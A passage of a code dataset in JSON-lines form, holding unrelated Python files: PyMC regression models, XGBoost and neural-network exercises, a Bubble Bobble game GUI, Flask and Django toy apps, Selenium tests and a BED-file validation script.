dict(x=elec_year, z1=elec_tem, y=elec_faults)\n\nwith pm.Model() as mdl_ols_glm:\n # family = pm.glm.families.StudentT()\n pm.glm.GLM.from_formula('y ~ 1+x + z1', data, family=pm.glm.families.Normal())\n # pm.glm.GLM.from_formula('y ~ 1 + x + z1', data, family=family)\n\n traces_ols_glm = pm.sample(3000)\npm.traceplot(traces_ols_glm)\nplt.show()\n\n\nwith pm.Model() as pooled_model:\n # define priors\n sigma = pm.HalfCauchy('sigma', 5)\n beta = pm.Normal('beta', 0, 1000)\n beta1 = pm.Normal('beta1', 0, 10000)\n beta2 = pm.Normal('beta2', 0, 1000)\n\n # define likelihood 建立与时间相关的函数\n # out_pai = pm.Deterministic('out_pai',)\n theta = beta + beta1*elec_year + beta2*elec_tem1\n Observed = pm.Normal(\"Observed\", theta, sd=sigma, observed=elec_faults1) # 观测值\n\n # start = pm.find_MAP()\n # step = pm.Metropolis()\n trace1 = pm.sample(4000, tune=1000)\nchain1 = trace1\nvarnames1 = ['sigma', 'beta', 'beta1', 'beta2']\npm.traceplot(chain1, varnames1)\nplt.show()\n'''\n# ======================================================================\n# unpooled_model\n# ======================================================================\nwith pm.Model() as unpooled_model:\n # define priors\n sigma = pm.HalfCauchy('sigma', 5)\n\n beta = pm.Normal('beta', 0, 1000, shape=companies)\n beta1 = pm.Normal('beta1', 0, 10000, shape=companies)\n beta2 = pm.Normal('beta2', 0, 1000)\n\n # define likelihood 建立与时间相关的函数\n theta = beta[company] + beta1[company]*elec_year + beta2*elec_tem1\n\n Observed = pm.Normal(\"Observed\", theta, sd=sigma, observed=elec_faults1) # 观测值\n\n # start = pm.find_MAP()\n # step = pm.Metropolis()\n trace2 = pm.sample(4000, tune=500)\nchain2 = trace2\nvarnames2 = ['sigma', 'beta', 'beta1', 'beta2']\npm.traceplot(chain2, varnames2)\nplt.show()\n\n# 画出自相关曲线\npm.autocorrplot(chain2)\nplt.show()\n\nprint(pm.dic(trace2, unpooled_model))\n'''\n# ======================================================================\n# partial_model\n# ======================================================================\nwith pm.Model() as partial_model:\n # define priors\n mu_a = pm.Normal('mu_a', mu=0., tau=0.0001)\n sigma_a = pm.HalfCauchy('sigma_a', beta=100)\n\n beta = pm.Normal('beta', 0, 100, shape=companies)\n beta1 = pm.Normal('beta1', mu=mu_a, sd=sigma_a)\n beta2 = pm.Normal('beta2', 0, 100)\n\n sigma = pm.HalfCauchy('sigma', 5) # Model error\n # define likelihood 建立与时间相关的函数\n # out_pai = pm.Deterministic('out_pai',)\n # theta = pm.Deterministic('theta', beta + beta1*elec_year + beta2*elec_tem1)\n theta = beta[company] + beta1 * elec_year + beta2 * elec_tem1\n\n Observed = pm.Normal(\"Observed\", theta, sd=sigma, observed=elec_faults1) # 观测值\n\n start = pm.find_MAP()\n step = pm.Metropolis()\n trace3 = pm.sample(5000, step=step, start=start, tune=1000)\nchain3 = trace3\nvarnames3 = ['mu_a', 'sigma_a', 'beta', 'beta1', 'beta2']\nvarnames4 = ['sigma']\npm.traceplot(chain3, varnames3)\nplt.show()\nplt.savefig('5partial_model.png', dpi=300, figsize=[14, 15])\npm.traceplot(chain3, varnames4)\nplt.show()\n# 画出自相关曲线\npm.autocorrplot(chain3)\nplt.show()\n\n# plt.figure(figsize=(6, 14))\n# pm.forestplot(chain3, varnames=['beta'])\n# plt.show()\n\nprint(pm.dic(trace3, partial_model))\n\n# ======================================================================\n# 模型对比\n# ======================================================================\nWaic = pm.compare([traces_ols_glm, trace1, trace3], [mdl_ols_glm, pooled_model, partial_model], ic='WAIC')\n# Waic = pm.compare([traces_ols_glm, trace1, trace2, trace3], [mdl_ols_glm, pooled_model, unpooled_model, partial_model], ic='WAIC')\nprint(Waic)\n\n\n\n# # 画出A公司的产品曲线\n# sig0 = pm.hpd(trace['theta'], alpha=0.6)[0]\n#\n# plt.figure()\n# ax = sns.distplot(sig0)\n\n\n\n","sub_path":"First_model/5Fifth.py","file_name":"5Fifth.py","file_ext":"py","file_size_in_byte":5827,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"154537840","text":"nouns={0:\"cat\",1:\"dog\",2:\"human\",3:\"whale\",4:\"dolphin\",5:\"pigeon\",6:\"eagle\",7:\"mammal\",8:\"bird\",9:\"animal\"}\nadj=[[0 for i in range(10)] for j in range(10)]\n\n\nadj[0][7]=1\nadj[1][7]=1\nadj[2][7]=1\nadj[3][7]=1\nadj[4][7]=1\nadj[5][8]=1\nadj[6][8]=1\nadj[7][9]=1\nadj[8][9]=1\n\n\n\ndef dfs(v):\n print(nouns[v])\n vis[v]=1\n for i in range(10):\n if adj[v][i] and not vis[i]:\n dfs(i)\nprint(\"Implementation of 'is a' relation\\n\")\nfor i in range(7):\n print(f\"Relation {i+1}\")\n vis=[0 for i in range(10)]\n if vis[i]==0:\n vis[i]=1\n dfs(i)","sub_path":"EXP_8/EXP8.py","file_name":"EXP8.py","file_ext":"py","file_size_in_byte":567,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"252788217","text":"class Solution:\n def uniqueOccurrences(self, arr: List[int]) -> bool:\n count = {}\n for i in range(len(arr)):\n if arr[i] in count:\n count[arr[i]] += 1\n else:\n count[arr[i]] = 1\n\n occurence_count = set()\n for c in count.values():\n if c in occurence_count:\n return False\n else:\n occurence_count.add(c)\n\n return True\n\n","sub_path":"BootCamp/CD1/UniqueNumberOfOccurences.py","file_name":"UniqueNumberOfOccurences.py","file_ext":"py","file_size_in_byte":456,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"587794269","text":"# -*- coding: utf-8 -*-\n\nimport pandas as pd\nimport numpy as np\nfrom sklearn.datasets import load_wine\nfrom sklearn.metrics import mean_squared_error, confusion_matrix, classification_report\nfrom sklearn.model_selection import train_test_split\n\nimport xgboost as xgb\n \nwine = load_wine()\n\nX = wine.data\ny = wine.target\n\nX_train, X_test, y_train, y_test = \\\ntrain_test_split(X, y, test_size=0.3, random_state=42)\n\n# 다항 분류를 위한 XGBClassifier 객체를 생성\n# objective 하이퍼 파라메터의 값을 multi:softmax or multi:softprob 으로 설정\nmodel = xgb.XGBClassifier(objective=\"multi:softprob\", \n n_estimators=1000,\n subsample=0.7,\n random_state=42)\nmodel.fit(X_train, y_train)\n\nprint(\"학습 결과 : \", model.score(X_train, y_train))\nprint(\"테스트 결과 : \", model.score(X_test, y_test))\n\ny_pred = model.predict(X_train)\nprint(\"confusion_matrix - 학습 데이터\")\nprint(confusion_matrix(y_train, y_pred))\n\ny_pred = model.predict(X_test)\nprint(\"confusion_matrix - 테스트 데이터\")\nprint(confusion_matrix(y_test, y_pred))\nprint(classification_report(y_test, y_pred))\n\n\n\n\n\n\n\n\n\n\n\n","sub_path":"2_scikit-learn/4_ensemble/5_xgboost/xgboost_04_Multiclass_Classifier.py","file_name":"xgboost_04_Multiclass_Classifier.py","file_ext":"py","file_size_in_byte":1195,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"145688381","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Sun Nov 22 18:53:09 2015\n\n@author: lifeng\n\"\"\"\n\nimport pandas as pd\nimport numpy as np\nimport itertools as it\nimport Rough\nimport datetime\n\n\ndef iscontain(p_B,p_D):\n part=set(range(len(p_B)))\n for i in range(len(p_B)):\n for j in range(len(p_D)):\n if p_B[i]<= p_D[j]:\n part=part-{i}\n return len(part)==0 \n\ndef partition(sys,att):\n\tgroup=sys.groupby(att)\n\tpart=[set(group.get_group(item).index) for item in group.indices]\n\treturn part\n\ndef aweakb(a,b):\n n = len(a)\n count = 0\n for i in range(n):\n count += (b[i]>=a[i])\n if count == n:\n return 1\n else:\n return 0\n \n \ndef DeleteAdd(element,collection):\n new = collection[:]\n for item in collection:\n if aweakb(element,item):\n return new\n break\n if aweakb(item,element):\n new.remove(item)\n new.append(element) \n return new\n \n\n#######################\ndata=pd.read_csv(\"C:\\\\Users\\\\lifeng\\\\Desktop\\\\paper_two\\\\sig_test\\\\UCISets\\\\wine_multi_data2.csv\",index_col='id')\n\nA=list(data.columns) \nAT=A[0:len(A)-1]\nD=A[len(A)-1]\nC = [1]*len(level)\nfor i in range(1,len(C)):\n C[i] = C[i-1]+ level[i-1] \nB=[A[i-1] for i in C]\n\n\np_B= Rough.partition(data,B)\np_D= Rough.partition(data,D)\npos= Rough.positive(p_B,p_D)\n\nscale = [0]+level\nnames = locals()\nA_list = []\nfor i in range(1,len(scale)):\n names['A%d'%i] = range(sum(scale[:i]),sum(scale[:i+1]))\n A_list.append(names['A%d'%i])\n\ncand=iter(it.product(*A_list))\n\nlst = [sum(scale[:i])-1 for i in range(1,len(scale))]\n\n\n\nNN = 1\nfor j in level:\n NN*=j\n \n\n\nstarttime = datetime.datetime.now()\nfirst = list(cand.next())\ns = [list(np.array(first)-np.array(lst))]\ni=0\n\nwhile i>> Escriba su codigo a partir de este punto <<<\n##\nimport itertools\ndatos = open('data.csv','r').readlines()\ndatos = [d.split('\\t') for d in datos]\nmes = [d[2].split('-')[1] for d in datos]\n[print(key,len(list(group)),sep=',') for key,group in itertools.groupby(sorted(mes))]","sub_path":"03-python=1/q04=1/question.py","file_name":"question.py","file_ext":"py","file_size_in_byte":714,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"310492512","text":"import g2d_pyg as g2d\nfrom random import randint, choice\nfrom boardgame_bubble_bobble import BubbleGame, Bubble\n\n# variabili globali\nCONT_STEP = 0 # contatore per i passi che deve compiere il nemico prima di cambiare direzione\nDECISION = randint(1,3) # scelte per i possibili movimenti del nemico\nDIRECTION = 0 # stabilisce la direzione della bolla in base alla direzione assunta dal drago\nSPEED = 5\nSTEP_DIR_FRAME = 15 # numero di frame prima che il nemico cambi la sua direzione (fatto per avere un movimento più semplice e lineare)\n\nclass BubbleGui:\n def __init__(self):\n self._game = BubbleGame()\n g2d.init_canvas(self._game.arena().size())\n self._sprites = g2d.load_image(\"bubble_bobble.png\")\n # self._sprites = g2d.load_image(\"https://tomamic.github.io/images/sprites/bubble-bobble.png\")\n g2d.main_loop(self.tick)\n\n\n def tick(self):\n global CONT_STEP, DECISION, DIRECTION\n\n # controlli da tastiera separati per ogni giocatore e con gestione della direzione per la bolla. A destra ←→↑↓ ; a sinistra WASD\n if g2d.key_pressed(\"ArrowUp\"):\n self._game.hero1().go_up()\n elif g2d.key_pressed(\"ArrowRight\"):\n self._game.hero1().go_right()\n DIRECTION = 1\n elif g2d.key_pressed(\"ArrowLeft\"):\n self._game.hero1().go_left()\n DIRECTION = 0\n elif (g2d.key_released(\"ArrowLeft\") or g2d.key_released(\"ArrowRight\")):\n self._game.hero1().stay()\n elif g2d.key_pressed(\"ArrowDown\"):\n dragon_x, dragon_y, dragon_w, dragon_h = self._game.hero1().position()\n if DIRECTION == 0:\n dragon_dimension = dragon_x - dragon_w\n speed = -SPEED\n elif DIRECTION == 1:\n dragon_dimension = dragon_x + dragon_w\n speed = SPEED\n self._game.bubble().append(Bubble(self._game.arena(), (dragon_dimension, dragon_y), speed))\n\n if g2d.key_pressed('w'):\n self._game.hero().go_up()\n elif g2d.key_pressed(\"d\"):\n self._game.hero().go_right()\n DIRECTION = 1\n elif g2d.key_pressed(\"a\"):\n self._game.hero().go_left()\n DIRECTION = 0\n elif (g2d.key_released(\"a\") or g2d.key_released(\"d\")):\n self._game.hero().stay()\n elif g2d.key_pressed(\"s\"):\n dragon_x, dragon_y, dragon_w, dragon_h = self._game.hero().position()\n if DIRECTION == 0:\n dragon_dimension = dragon_x - dragon_w\n speed = -SPEED\n elif DIRECTION == 1:\n dragon_dimension = dragon_x + dragon_w\n speed = SPEED\n self._game.bubble().append(Bubble(self._game.arena(), (dragon_dimension, dragon_y), speed))\n \n # decisione del movimento per il nemico aggiornando il numero di passi con il tick\n CONT_STEP += 1\n if CONT_STEP == STEP_DIR_FRAME:\n for enemy in self._game.enemy():\n DECISION = randint(1,3)\n enemy.decision(DECISION)\n CONT_STEP = 0\n else:\n for enemy in self._game.enemy():\n enemy.decision(DECISION)\n\n # controllo se il giocatore è vivo e nel caso lo rimuov0 e lo riaggiungo nel punto di origine\n if self._game.hero().lives() == 0:\n self._game.arena().remove(self._game.hero())\n g2d.alert(\"Sei stato eliminato!\")\n self._game.hero().restore()\n\n if self._game.hero1().lives() == 0:\n self._game.arena().remove(self._game.hero1())\n g2d.alert(\"Sei stato eliminato!\")\n self._game.hero1().restore()\n \n self._game.arena().move_all() # Game logic\n \n # disegno degli elementi grafici\n g2d.clear_canvas()\n\n for i in self._game.platform():\n i.fill()\n\n for a in self._game.arena().actors():\n if a.symbol() != (0, 0, 0, 0):\n g2d.draw_image_clip(self._sprites, a.symbol(), a.position())\n else:\n g2d.fill_rect(a.position())\n\n # gestione delle vite, dei punti e del tempo nell'interfaccia\n lives_player = \"Player1 Lives: \" + str(self._game.hero().lives())\n lives_player1 = \"Player2 Lives: \" + str(self._game.hero1().lives())\n points = \"Points: \" + str(self._game.hero().points() + self._game.hero1().points())\n toplay = \"Time: \" + str(self._game.remaining_time())\n\n g2d.draw_text(lives_player + \" \" + toplay + \" \" + points, (0, 0), 24)\n g2d.draw_text(lives_player1, (0,24), 24)\n\n # creazione degli alert per il termine del gioco\n if self._game.game_over():\n g2d.alert(\"Game over\")\n g2d.close_canvas()\n\n elif self._game.game_won():\n g2d.alert(\"Game won\")\n g2d.close_canvas()\n\ngui = BubbleGui()","sub_path":"boardgui_bubble_bobble.py","file_name":"boardgui_bubble_bobble.py","file_ext":"py","file_size_in_byte":4990,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"57154114","text":"'''\npython = 2\nnumpy\n'''\nfrom numpy import exp, array, random, dot\n\n\nclass NeuralNerwork():\n def __init__(self):\n random.seed(1)\n self.weights = 2 * random.random((3,1)) - 1\n\n def __sigmoid(self, x):\n return 1 / (1 + exp(-x))\n\n def __sigmoid_derivative(self, x):\n return x * (1 - x)\n\n def train(self, training_input, training_output, iterations):\n for inter in xrange(iterations):\n output = self.predict(training_input)\n error = training_output - output\n #meaning of here?\n adjustments = dot(training_input.T, error * self.__sigmoid_derivative(output))\n self.weights += adjustments\n\n def predict(self, inputs):\n return self.__sigmoid(dot(inputs, self.weights))\n\ndef dataset():\n i = array([[0, 0, 1],[1, 1, 1],[1, 0, 1],[0, 1, 1]])\n o = array([[0, 1, 1, 0]]).T\n return i, o\n\nif __name__ == \"__main__\":\n #prepare dataset\n training_set_inputs, training_set_outputs = dataset()\n print (training_set_inputs)\n print (\"----------------------------------------------------\")\n print (training_set_outputs)\n print (\"----------------------------------------------------\")\n #initialise neural network\n nn = NeuralNerwork()\n\n #train the neural network\n nn.train(training_set_inputs, training_set_outputs, 10000)\n\n print (\"New weights:\")\n print (\"----------------------------------------------------\")\n print (nn.weights)\n print (\"----------------------------------------------------\")\n\n #test the model\n print ((\"[1, 0, 0]:\"))\n print (\"----------------------------------------------------\")\n print (nn.predict(array([1, 0, 0])))\n","sub_path":"neural_network/siraj_nn/siraj_nn.py","file_name":"siraj_nn.py","file_ext":"py","file_size_in_byte":1692,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"129767111","text":"\"\"\"hypercar URL Configuration\n\nThe `urlpatterns` list routes URLs to views. For more information please see:\n https://docs.djangoproject.com/en/2.2/topics/http/urls/\nExamples:\nFunction views\n 1. Add an import: from my_app import views\n 2. Add a URL to urlpatterns: path('', views.home, name='home')\nClass-based views\n 1. Add an import: from other_app.views import Home\n 2. Add a URL to urlpatterns: path('', Home.as_view(), name='home')\nIncluding another URLconf\n 1. Import the include() function: from django.urls import include, path\n 2. Add a URL to urlpatterns: path('blog/', include('blog.urls'))\n\"\"\"\nfrom django.urls import path\nfrom tickets.views import WelcomePageView, MenuPageView, TicketPageView, ProcessingPageView, NextTicketView\n\nurlpatterns = [\n # path('admin/', admin.site.urls),\n path('welcome/', WelcomePageView.as_view()),\n path('menu/', MenuPageView.as_view()),\n path('get_ticket/', TicketPageView.as_view()),\n path('processing', ProcessingPageView.as_view()),\n path('next', NextTicketView.as_view())\n]\n","sub_path":"hypercar/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":1085,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"131329327","text":"from django.shortcuts import render,render_to_response\nfrom django.template import RequestContext\nfrom django.template.context_processors import csrf\nfrom django.http import HttpResponse\n\n\nimport tushare as ts\nimport pandas as pd\nimport numpy as np\nimport os\nimport pickle\nimport matplotlib.pyplot as plt\n\neps = {'2010':0,'2011':0,'2012':0,'2013':0,'2014':0,'2015':0,'2016':0,'2017':0,}\n\n\ndef get_eps(code):\n for i in range(2010,2017):\n if os.path.exists('/home/wk/wkfile/data'+str(i)+'.pkl'):\n with open('/home/wk/wkfile/data'+str(i)+'.pkl','rb') as f:\n data = pickle.load(f)\n else:\n data = ts.get_report_data(i,4)\n with open('/home/wk/wkfile/data'+str(i)+'.pkl','wb') as f:\n pickle.dump(data,f)\n if str(i) in eps.keys():\n eps[str(i)] = data[ data['code'] == code ].iloc[0,2] \n return eps\n\ndef get_price(code):\n return ts.get_k_data(code,start='2011-01-01',end='2017-12-29')\n\ndef calculate_pe(eps,Price):\n pe = pd.Series(0,Price.date)\n for i in Price.date:\n year_now = i.split('-')[0]\n year_before = str(int(year_now)-1)\n pe.at[i] = (Price[Price.date == i].close)/(eps[year_before])\n return pe\n\ndef get_pe():\n eps = get_eps('600519')\n Price = get_price('600519')\n pe = calculate_pe(eps,Price)\n return pe\n\ndef get_pe_data(request):\n pe = get_pe()\n stock_pe=[]\n for i in pe:\n stock_pe.append(i)\n stock_pe.append('*')\n return HttpResponse(stock_pe)\n\ndef get_pe_date(request):\n pe = get_pe()\n stock_date=[]\n for i in pe.index:\n stock_date.append(i)\n stock_date.append('*')\n return HttpResponse(stock_date)\n\ndef index(request):\n return render(request,'myapp/index.html')\n#def index(request):\n# return render_to_response('myapp/index.html', context=csrf(request))\n\n# Create your views here.\n","sub_path":"myapp/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":1890,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"638265543","text":"import numpy as np\nimport matplotlib.pyplot as plt\nfrom scipy import integrate\n\n\n\nalphaI=7.2\nalphaN=11.08\nF=0.6\nm=0\nIo=0.58\nB=0.51/2\n\ndef potential(F,n,A,B):\n \n t1= (1-(1+m)*np.sqrt(I(F))/2.0)/(2*n)\n \n t2= n*F/8\n \n t3= (m**2-1)/(8*n**2)\n \n t4= A * np.exp(-3*B/n) * (alphaI*F/n**2) +I(F)/4.0\n \n \n return -t1 - t2 + t3 + t4\n\n\n\n\ndef I(F):\n \n return Io + ((alphaN-alphaI)*F**2)/(2)\n\n\nF=[0,0.2,0.4,0.6,0.8]\n\nn=np.linspace(0.01,10,1000)\nV0=potential(F[0],n,1,1)\nV1=potential(F[1],n,1,1)\nV2=potential(F[2],n,1,1)\nV3=potential(F[3],n,1,1)\nV4=potential(F[4],n,1,1)\n\n\nplt.plot(n,V0,label=\"$ F=$\"+str(F[0]) )\nplt.plot(n,V1,label=\"$ F=$\"+str(F[1]) )\nplt.plot(n,V2,label=\"$ F=$\"+str(F[2]))\nplt.plot(n,V3,label=\"$ F=$\"+str(F[3]))\nplt.plot(n,V4,label=\"$ F=$\"+str(F[4]))\nplt.ylim(-1.5,1.5)\n\nplt.title(\"$ Potentials $\",size=20)\nplt.xlabel(\"$ \\eta\\ (a.u.) $\",size=15)\nplt.ylabel(\"$ V(\\eta,F)+I_P(F)/4 $\",size=15)\n\n\nplt.legend(loc=1)\nplt.savefig(\"pot_parab_F_uncorrected.png\")\nplt.plot()\nplt.show()\n","sub_path":"Times/Potential_eta/uncorrected_F.py","file_name":"uncorrected_F.py","file_ext":"py","file_size_in_byte":1019,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"310325917","text":"# Iteratively method\n# Given [1,2,3]\n# when num points to 1\n# ans will be [] + [1]\n# result in [[], [1]]\n# when num points to 2\n# ans will be [[]+[2], [1]+ [2]\n# result in [[], [1], [2], [1,2]]\n# and finally\n# [[], [1], [2], [3], [1,2], [1,2,3]]\n\n\ndef subsets_iter(nums):\n ans = [[]]\n for num in nums:\n ans += [item + [num] for item in ans]\n return ans\n\n'''\nVisualization\ndfs(nums = [1,2,3], index = 0, path = [], res = [])\n dfs(nums = [1,2,3], index = 1, path = [1], res = [[]])\n dfs(nums = [1,2,3], index = 2, path = [1,2], res = [[], [1]])\n def(nums = [1,2,3], index = 3, path = [1,2,3], res = [[], [1], [1,2]])\n next: res = [[], [1], [1,2], [1,2,3]]\n loop will not execute\n dfs(nums = [1,2,3], index = 2, path [[2]], res = [[], [1],[1,2], [1,2,3]])\n dfs(nums = [1,2,3], index = 3, path = [[2,3]], res = [[], [1], [1,2], [1,2,3], [2])\n next iteration res = [[], [1], [1,2], [1,2,3], [2], [2,3])\n for loop will not be executed\n dfs(nums = [1,2,3], index = 3, path [[3]], res = [[], [1], [1,2], [1,2,3], [2], [2,3]])\n next iteration res = [[], [1],[1,2],[1,2,3],[2],[2,3],[3])\n for loop will not be executed\n'''\n\ndef subsets_dfs(nums):\n ans = []\n # base case\n dfs(nums, 0, [], ans)\n return ans\ndef dfs(nums, index, path, ans):\n ans.append(path)\n for i in range(index, len(nums)):\n print(\"This is current i\")\n print(i)\n print(\"This is current index\")\n print(index)\n print(\"This is current path\")\n print(path)\n print(\"This is current answer\")\n print(ans)\n dfs(nums, i+1, path + [nums[i]], ans)\n\nnums = [1,2,3]\nprint(subsets_dfs(nums))\n","sub_path":"dynamic/subsets_78.py","file_name":"subsets_78.py","file_ext":"py","file_size_in_byte":1732,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"449241429","text":"from flask import Flask, render_template\napp = Flask(__name__)\n\n@app.route(\"/\")\n@app.route(\"/home\")\ndef home():\n return render_template(\"home.html\")\n\n@app.route(\"/about\")\ndef about():\n return render_template(\"about.html\")\n\n@app.route(\"/advice\")\ndef advice():\n import random\n quotes = [];\n quotes.append(\"We all wear masks, and the time comes when we cannot remove them without removing some of our own skin.\")\n quotes.append(\"We understand how dangerous a mask can be. We all become what we pretend to be.\")\n quotes.append(\"Nothing is more real than the masks we make to show each other who we are.\")\n quotes.append(\"An honest enemy is better than a friend who lies.\")\n quotes.append(\"Who knows what's behind that smile?\")\n quotes.append(\"Why so serious?\")\n s = quotes[random.randrange(0,len(quotes))]\n\n return render_template(\"advice.html\", quote = s)\n\n@app.route(\"/ask\")\n@app.route(\"/ask/\")\n@app.route(\"/ask/\")\ndef ask(word=\"\"):\n d = {};\n d['knife'] = \"A useful toy. It can bring suffering... or relief. Have you ever tried juggling several of them at once?\"\n d['friend'] = \"I have no friends, only acquantances. As soon as you feel like you can call someone a friend, that's when they can stab you in the back.\"\n d['box'] = \"A present? How sweet. I love surprises. But it seems like few others I've met do... I wonder why...\"\n return render_template(\"ask.html\", d = d, word=word)\nif __name__==\"__main__\":\n app.debug = True\n app.run(host='127.0.0.1',port=8001)\n","sub_path":"6/02-flask-intro/wu_raymond/app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":1526,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"9595106","text":"import unittest\nimport HTMLTestRunner\n\nfrom selenium import webdriver\nfrom pyvirtualdisplay import Display\n\nclass MozillaTesting(unittest.TestCase):\n\n display = Display(visible=0, size=(1366, 768))\n display.start()\n\n def setUp(page):\n page.driver = webdriver.Firefox()\n\n def test_openMozilla(page):\n driver = page.driver\n driver.get(\"http://192.168.110.40:8080/app/tickets\")\n page.assertIn(\"Consoft\", driver.title)\n\n def test_insertTicketMozilla(page):\n driver = page.driver\n driver.get(\"http://192.168.110.40:8080/app/tickets\")\n inputElement = page.driver.find_element_by_link_text(\"Crea il tuo Ticket\")\n inputElement.click()\n\n def tearDown(page):\n page.driver.close()\n\t\t\nclass ChromeTesting(unittest.TestCase):\n\n def setUp(page):\n options = webdriver.ChromeOptions()\n options.add_argument('headless')\n options.add_argument('window-size=1366x768')\n options.add_argument('no-sandbox')\n page.driver = webdriver.Chrome(chrome_options=options)\n\n def test_openChrome(page):\n driver = page.driver\n driver.get(\"http://192.168.110.40:8080/app/tickets\")\n page.assertIn(\"Consoft\", driver.title)\n\n def test_insertTicketChrome(page):\n driver = page.driver\n driver.get(\"http://192.168.110.40:8080/app/tickets\")\n inputElement = page.driver.find_element_by_link_text(\"Crea il tuo Ticket\")\n inputElement.click()\n\n def tearDown(page):\n page.driver.close()\n\nsuite = unittest.TestSuite()\nsuite.addTests([\n\tunittest.defaultTestLoader.loadTestsFromTestCase(MozillaTesting),\n\tunittest.defaultTestLoader.loadTestsFromTestCase(ChromeTesting)\n\t])\n\nrunner = HTMLTestRunner.HTMLTestRunner(\n title='Functional Tests',\n description='Report'\n )\n\n\nrunner.run(suite)\n","sub_path":"selenium/suite.py","file_name":"suite.py","file_ext":"py","file_size_in_byte":1853,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"174370806","text":"#/usr/bin/python\n\"\"\"\ncoding sequeces to be assesed with transcript in\ncomposite bed\n\"\"\"\n\nimport os\nimport argparse\nimport csv\nimport subprocess\nimport logging\nimport time\nimport datetime\nfrom collections import defaultdict\nimport create_composite_bed\n\nTMP_OUT_DIR=os.getcwd()\nlogger_file = \"bed_validation\"\n\n\ndef main():\n args = parse_args()\n run(args.bed_file, args.composite_bed,args.transcript_mapping)\n\n\ndef run(bed_file, composite_bed, transcript_mapping):\n logger = configure_logger(logger_file)\n index_dict = index_composite_bed(composite_bed)\n transcript_cds_dict = create_dict(transcript_mapping)\n compare_coding = asses_region(bed_file, index_dict, transcript_cds_dict, logger)\n \n\ndef parse_args():\n parser = argparse.ArgumentParser(description=__doc__)\n parser.add_argument('-b', dest='bed_file', type=argparse.FileType('r'),\n help=\"path to gene bed file\", required=True)\n parser.add_argument('-c', dest='composite_bed', type=argparse.FileType('r'),\n help=\"path to composite bed file\", required=True)\n parser.add_argument('-t', dest='transcript_mapping', type=argparse.FileType('r'),\n help='transcript cds tsv file', required=True)\n args = parser.parse_args()\n return args\n\n\ndef configure_logger(filename):\n \"\"\"\n setting up logging\n \"\"\"\n logger = logging.getLogger(filename)\n logger.setLevel(logging.DEBUG)\n handler = logging.FileHandler(time.strftime(filename + \"-%Y%m%d.log\"))\n handler.setLevel(logging.DEBUG)\n formatter = logging.Formatter(\"%(asctime)s'\\t'%(name)s'\\t'%(levelname)s'\\t'%(message)s\")\n handler.setFormatter(formatter)\n logger.addHandler(handler)\n return logger\n\n\n\nclass bed_file():\n\n def __init__(self, line):\n value = line.split('\\t')\n self.chrom = value[0].strip()\n self.start = int(value[1])\n self.stop = int(value[2])\n self.gene = value[3].strip()\n self.transcript = value[4].strip()\n self.exon = value[5].strip()\n self.strand = value[6].strip()\n\n def __iter__(self):\n return self\n\n def chromosome(self):\n return self.chrom\n\n def bed_start(self):\n return self.start\n \n def bed_stop(self):\n return self.stop\n\n def bed_gene(self):\n return self.gene\n\n def bed_transcript(self):\n return self.transcript\n\n\n def bed_exon(self):\n if not self.exon.startswith('Ex'):\n return 'Ex' + self.exon\n else:\n return self.exon\n\n def bed_strand(self):\n return self.strand\n\n\ndef index_composite_bed(composite_bed):\n index_composite_dict = {}\n headers = ['chrom', 'start', 'stop', 'gene', 'transcript', 'exon', 'strand']\n reader = csv.DictReader(composite_bed, delimiter='\\t', fieldnames=headers)\n for row in reader:\n trascript = row['transcript']\n exon = row['exon']\n strand = row['strand']\n key = trascript + ':' + exon\n value = [row['start'], row['stop']]\n index_composite_dict[key] = value\n return index_composite_dict\n\n\ndef remove_trash(somefile):\n if os.path.isfile(somefile):\n os.remove(somefile)\n else:\n pass\n\n\ndef create_dict(mapping_file):\n mapping_dict = {}\n for raw_line in mapping_file:\n value = raw_line.strip().split('\\t')\n mapping_dict[value[0]] = [value[1], value[2]]\n return mapping_dict\n\n\ndef asses_region(gene_bed, index_composite_dict, transcript_cds_dict, logger):\n for raw_line in gene_bed:\n value = raw_line.strip()\n parse_bed = bed_file(value)\n chrom = parse_bed.chromosome()\n transcript = parse_bed.bed_transcript()\n start = parse_bed.bed_start()\n stop = parse_bed.bed_stop()\n exon = parse_bed.bed_exon()\n gene = parse_bed.bed_gene()\n strand = parse_bed.bed_strand()\n gene_key = transcript + ':' + exon \n if index_composite_dict[gene_key]:\n check_position = compare_region(start, stop, index_composite_dict[gene_key][0], \n index_composite_dict[gene_key][1], gene, transcript, exon, strand, transcript_cds_dict, logger)\n \n \n\ndef compare_region(gene_cds_start, gene_cds_stop, trans_cds_start, trans_cds_stop, gene, transcript, exon, strand, transcript_cds_dict, logger):\n if strand == '+':\n if int(gene_cds_start) <= int(trans_cds_start) <= int(gene_cds_stop):\n pass\n else:\n if transcript.startswith('NM_'):\n cds_start = int(transcript_cds_dict[transcript][0])\n cds_stop = int(transcript_cds_dict[transcript][1])\n if cds_start <= int(gene_cds_start) <= cds_stop:\n logger.debug(\"start {0} for gene {1} for exon {2} should be {3} according to transcript {4}\".format(gene_cds_start, gene,\n exon,\n trans_cds_start,\n transcript))\n \n else:\n logger.debug(\"start {0} for gene {1} for exon {2} should be {3} according to transcript {4}\".format(gene_cds_start, gene, \n exon,\n trans_cds_start, 